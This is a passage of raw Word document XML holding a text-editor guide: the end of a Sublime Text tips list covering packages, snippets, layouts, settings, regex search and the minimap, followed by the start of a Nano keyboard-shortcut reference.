    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    BracketHighlighter (better matching of {} () [])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    GitGutter (show git diffs in the margin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    SublimeLinter (code linting)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Material Theme (beautiful UI themes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🚀 6. Snippets and auto-completion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type part of a keyword and hit Tab to auto-expand it (e.g., html → full HTML skeleton).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can even create your own snippets!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🛠️ 7. Split editing / layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Under View &gt; Layout, you can split the editor into multiple panes (vertical, horizontal, grid) to work on several files side by side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔧 8. Settings (JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can edit Preferences &gt; Settings directly in JSON, giving you fine-grained control over how Sublime behaves (like tab width, rulers, word wrap).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🌐 9. Regex search / replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+F for find, Ctrl+H for replace, and enable the .* button to use regex in your searches — super handy for advanced editing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔥 10. Minimap (code overview)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the right-hand side, you get a mini view of your whole file — drag it to quickly jump around large scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_caujm93ad7ij" w:id="475"/>
      <w:bookmarkEnd w:id="475"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C6">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's a guide to commonly used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano shortcuts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help you efficiently navigate, edit, and manage text files in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C7">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Navigation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Move to the beginning of the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Move to the end of the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Y</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Scroll up one screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + V</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Scroll down one screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Undo and Redo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Undo the last action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redo the last undone action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes the character under the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cuts (deletes) the entire line where the cursor is located.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + J</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Justifies (reformats) the current paragraph.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opens a spellchecker (if installed).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search and Replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search for text. After entering the search term,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34DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat the last search.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">**Ctrl + **: Search and replace text. Enter the search term, press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then enter the replacement term.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
